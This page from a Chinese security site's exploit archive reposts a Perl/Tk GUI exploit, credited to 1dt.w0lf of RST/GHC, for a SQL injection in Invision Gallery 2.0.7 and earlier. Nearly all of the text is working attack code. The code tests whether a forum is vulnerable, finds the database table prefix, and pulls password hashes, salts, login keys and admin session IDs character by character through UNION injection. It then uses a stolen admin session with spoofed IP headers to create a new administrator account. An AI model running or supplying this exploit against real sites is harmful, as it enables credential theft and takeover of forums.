首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Invision Gallery <= 2.0.7 Remote SQL Injection Exploit
来源:http://rst.void.ru 作者:1dt.w0lf 发布时间:2008-01-23  
#!/usr/bin/perl

## Invision Gallery version <= 2.0.7 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC

##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
##                   KEEP IT PRIVATE

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "r57ig207" );

$mw->geometry ( '420x510' ) ;
$mw->resizable(0,0);

$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Gallery <=2.0.7 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';
$group = 1;
$curr_user = 0;
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';

$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->insert("end", "admin_sessions");
$b2->insert("end", "validating");
$b2->pack( -side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fright->Button(-text    => 'Test forum vulnerability',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&test_vuln
               )->pack();

$fright->Button(-text    => 'Get database tables prefix',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&get_prefix
               )->pack();

$fright->Button(-text    => 'Get data from database',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&get_data
               )->pack();

$fright->Button(-text    => 'Create new admin',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&create_admin
               )->pack();



$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '+++ PRIV8 +++', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();

MainLoop();

sub update_columns()
{
$b->delete(0,"end");
if($table eq 'members'){
$column = "member_login_key"; 
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
} elsif($table eq 'members_converge'){
$column = "converge_pass_hash"; 
$b->insert("end", "converge_pass_hash");
$b->insert("end", "converge_pass_salt");
$b->insert("end", "converge_email");
} elsif($table eq 'admin_sessions'){
$column = "session_id"; 
$b->insert("end", "session_id");
$b->insert("end", "session_ip_address");
$b->insert("end", "session_member_name");
$b->insert("end", "session_member_id");
} elsif($table eq 'validating'){
$column = "vid"; 
$b->insert("end", "vid");
}
}

sub get_data()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title   => 'get data from database', -buttons => ["OK"]);
if($table eq 'members') { $id_text = 'id'; }
if($table eq 'members_converge') { $id_text = 'converge_id'; }
if($table eq 'admin_sessions') { $id_text = 'session_member_id'; }
if($table eq 'validating') { $id_text = 'member_id'; }
$i = 1;
$report = '';
while(1)
{
$ret = get_char($i);
if($ret == 0) { last; }
else { $report .= chr($ret); $i++; $mw->update(); }
}
if($report eq '') {
$InfoWindow->add('Label', -text => 'Can\'t get data', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
} else {
if($column eq 'session_id') { $session_id = $report; $mw->update(); }
elsif($column eq 'session_ip_address') { $session_ip_address = $report; $mw->update(); }
$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;

$InfoWindow->Show();
$InfoWindow->destroy;
}

sub get_char()
{
$res = $xpl->get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,ascii(substring(".$column.",".$_[0].",1)),1,1,1,1,1,1,1,1 FROM $prefix$table WHERE $id_text = $user_id");
if($res->as_string =~ /cmd=user&user=(\d*)&op=view_album/) { $rep = $1; }
else { $rep = 0; }
return $rep;
}

sub create_admin()
{
$InfoWindow=$mw->DialogBox(-title   => 'create new admin', -buttons => ["OK"]);
if($session_id eq '' || $session_ip_address eq '')
  {
  $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
  }
elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
  {
  $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
  }
else
  {
$xpl = LWP::UserAgent->new( ) or die;
($url2 = $url) =~ s/index.php/admin.php/;
$cf = '';
%fields = (
'code'     => 'doadd',
'act'      => 'mem',
'section'  => 'content',
'name'     => $new_admin_name,
'password' => $new_admin_password,
'email'    => $new_admin_email,
'mgroup'   => 4, ## default admin group , maybe need change   
           );
if($use_custom_fields)
  {
  @cf = split(',',$custom_fields);
  foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
  }

$res = $xpl->post($url2."?adsess=$session_id",
[
%fields,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
  }
$InfoWindow->Show();
$InfoWindow->destroy;
}

sub test_vuln()
{
$InfoWindow=$mw->DialogBox(-title   => 'test forum vulnerability', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,11457,1,1,1,1,1,1,1,1/*");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /cmd=user&user=(\d*)&op=view_album/) { $rep = $1; }
if($rep == 11457) { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}


sub get_prefix()
{
$InfoWindow=$mw->DialogBox(-title   => 'get database tables prefix', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1\\");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /FROM (.*)gallery_albums/)
{
$prefix = $1;
$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
}
else
{
$InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy; 
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP-Nuke <= 8.0 Final (sid) Re
·Lycos FileUploader Control Act
·PHP-Nuke < 8.0 (sid) Remote SQ
·Comodo AntiVirus 2.0 ExecuteSt
·YaBB SE <= 1.5.5 Remote Comman
·Apple iPhone 1.1.2 Remote Deni
·SetCMS 3.6.5 (setcms.org) Remo
·Move Networks Upgrade Manager
·Coppermine Photo Gallery <= 1.
·ImageShack Toolbar 4.5.7 FileU
·HP Virtual Rooms WebHPVCInstal
·Sejoong Namo ActiveSquare 6 Na
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved